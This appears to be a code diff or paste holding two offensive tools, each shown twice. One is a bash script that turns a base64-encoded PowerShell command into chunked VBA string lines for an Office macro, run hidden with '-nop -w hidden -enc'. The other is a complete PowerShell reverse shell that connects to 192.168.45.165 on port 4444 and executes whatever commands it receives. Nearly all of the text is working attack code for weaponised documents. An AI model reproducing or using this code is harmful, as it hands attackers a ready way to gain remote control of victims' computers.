plmi · December 19, 2025 15:36
diff --git a/powershell-to-macro.sh b/powershell-to-macro.sh
 #!/usr/bin/env bash
 # Description: Convert a base64 encoded PowerShell command to a VBA expression that bypasses the 255 character limit.
 # Usage 1: cat reverse-shell.ps1 | iconv -t UTF-16LE | base64 -w 0 | ./powershell-to-macro.sh
 # Usage 2: ./powershell-to-macro.sh -c "<base64 encoded powershell command>

 set -euo pipefail

 usage() {
  echo "Usage: $0 [-c string]"
  echo "       echo 'text' | $0"
  exit 1
 }

 # Must be UTF-16LE
 COMMAND_BASE64=""

 # Parse options
 while getopts ":c:" opt; do
  case "$opt" in
    c)
      COMMAND_BASE64="$OPTARG"
      ;;
    *)
      usage
      ;;
  esac
 done

 # If -c was not provided, check for piped input
 if [[ -z "$COMMAND_BASE64" ]]; then
  if [[ ! -t 0 ]]; then
    # stdin is being piped
    COMMAND_BASE64="$(cat)"
  else
    usage
  fi
 fi

 COMMAND_BASE64="powershell.exe -nop -w hidden -enc $COMMAND_BASE64"
 COMMAND_LENGTH=${#COMMAND_BASE64}
 LINE_LENGTH=50

 for (( i=0; i<COMMAND_LENGTH; i+=LINE_LENGTH )); do
    CHUNK=${COMMAND_BASE64:i:LINE_LENGTH}
    echo "Str = Str + \"${CHUNK}\""
 done
diff --git a/reverse-shell.ps1 b/reverse-shell.ps1
 $client = New-Object System.Net.Sockets.TCPClient('192.168.45.165', 4444);
 $stream = $client.GetStream();
 [byte[]]$bytes = 0..65535|%{0};
 while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = ([System.Text.Encoding]::ASCII).GetString($bytes, 0, $i);
    $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String);
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([System.Text.Encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte, 0, $sendbyte.Length);
    $stream.Flush();
 }
 $client.Close();
	#!/usr/bin/env bash
	# Description: Convert a base64 encoded PowerShell command to a VBA expression that bypasses the 255 character limit.
	# Usage 1: cat reverse-shell.ps1 \| iconv -t UTF-16LE \| base64 -w 0 \| ./powershell-to-macro.sh
	# Usage 2: ./powershell-to-macro.sh -c "<base64 encoded powershell command>

	set -euo pipefail

	usage() {
	echo "Usage: $0 [-c string]"
	echo " echo 'text' \| $0"
	exit 1
	}

	# Must be UTF-16LE
	COMMAND_BASE64=""

	# Parse options
	while getopts ":c:" opt; do
	case "$opt" in
	c)
	COMMAND_BASE64="$OPTARG"
	;;
	*)
	usage
	;;
	esac
	done

	# If -c was not provided, check for piped input
	if [[ -z "$COMMAND_BASE64" ]]; then
	if [[ ! -t 0 ]]; then
	# stdin is being piped
	COMMAND_BASE64="$(cat)"
	else
	usage
	fi
	fi

	COMMAND_BASE64="powershell.exe -nop -w hidden -enc $COMMAND_BASE64"
	COMMAND_LENGTH=${#COMMAND_BASE64}
	LINE_LENGTH=50

	for (( i=0; i<COMMAND_LENGTH; i+=LINE_LENGTH )); do
	CHUNK=${COMMAND_BASE64:i:LINE_LENGTH}
	echo "Str = Str + \"${CHUNK}\""
	done
	$client = New-Object System.Net.Sockets.TCPClient('192.168.45.165', 4444);
	$stream = $client.GetStream();
	[byte[]]$bytes = 0..65535\|%{0};
	while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
	$data = ([System.Text.Encoding]::ASCII).GetString($bytes, 0, $i);
	$sendback = (Invoke-Expression -Command $data 2>&1 \| Out-String);
	$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
	$sendbyte = ([System.Text.Encoding]::ASCII).GetBytes($sendback2);
	$stream.Write($sendbyte, 0, $sendbyte.Length);
	$stream.Flush();
	}
	$client.Close();